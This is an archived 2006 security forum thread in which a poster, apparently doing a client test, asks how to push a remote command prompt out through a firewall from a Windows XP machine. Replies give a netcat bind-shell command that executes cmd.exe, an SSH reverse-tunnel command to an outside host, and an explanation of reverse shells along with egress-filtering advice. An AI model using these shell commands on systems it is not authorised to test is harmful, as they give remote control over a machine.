April 7th, 2006, 12:11 AM
Reverse Command Prompt Suggestions
I didn't know exactly which forum to post this question. I thought this would be the most logical.
I am conducting a test of technical security controls for a client and I'm looking for the easiest way to do this. I mainly want to test their IDS and AV capabilities. This is not a comprehense test of their systems, just a part as you can see.
I would like your suggestions on programs that can spawn a remote command prompt outbound through a firewall via a specific port from a WinXP box. The delivery method is a non-problem. I will ensure the files gets on the system. Mainly I just need to have the shell get sent out of the firewall so i can connect to it.
Any thoughts would be appreciated. Simplicity is key here. As mentioned before this is not a comprehensive test, just a one off.
April 7th, 2006, 12:21 AM
netcat is your friend
netcat is one way.
that's after a really quick search and scan. i think it'll tell you how. too lazy to look harder, but your google terms should include: netcat shovel shell
caveat h4x0r - use of netcat may, can, and WILL likely get you fired if you don't have explicit permission and authorization.
"Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
"...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore
April 7th, 2006, 11:44 AM
Netcat is prolly the ideal way as has been suggested;
nc -l -p 23 -t -e cmd.exe
nc = netcat
-l = listen to
-p = port (to be listend to)
23 = port number to be listened to, telnet in this case)
-t = tells it to listen to telnet connections
-e = execute
cmd.exe = [execute] command prompt
So in a nut shell, nc will listen on port 23 for a connection, when you connect it will execute the command prompt.
Bear in mind though that if you are doing this on a enterprise network nc will sit in front of whatever should be running on that port. So say if you ran it on port 139,445 etc it would be sitting in front of legitemate NetBIOS/File sharing applications.
April 9th, 2006, 06:16 PM
This is pertaining to linux, but if this WinXp machine had cygwin or similar, you could try using ssh.
Create a ssh tunnel from behind the firewall to the outside system.
"ssh -v -R 2222:localhost:22 outsideIP"
Then from the outside computer, connect to the localhost.
"ssh -p 2222 localhost"
This might not help you, but good to keep your options open in case.
The command completed successfully.
\"They drew first blood not me.\"
April 10th, 2006, 02:12 PM
A reverse command prompt means the victim's machine connects back to the attacker.. Not the attacker connecting to the victim..
So I would have a netcat listening on a certain port, fire my exploit at the target, the target connects back to my netcat giving me a command prompt.. You can use this when the target doesn't allow incoming connections but does allow outgoing connections.. This is the reason you should monitor/firewall egress network traffic..
Experience is something you don't get until just after you need it.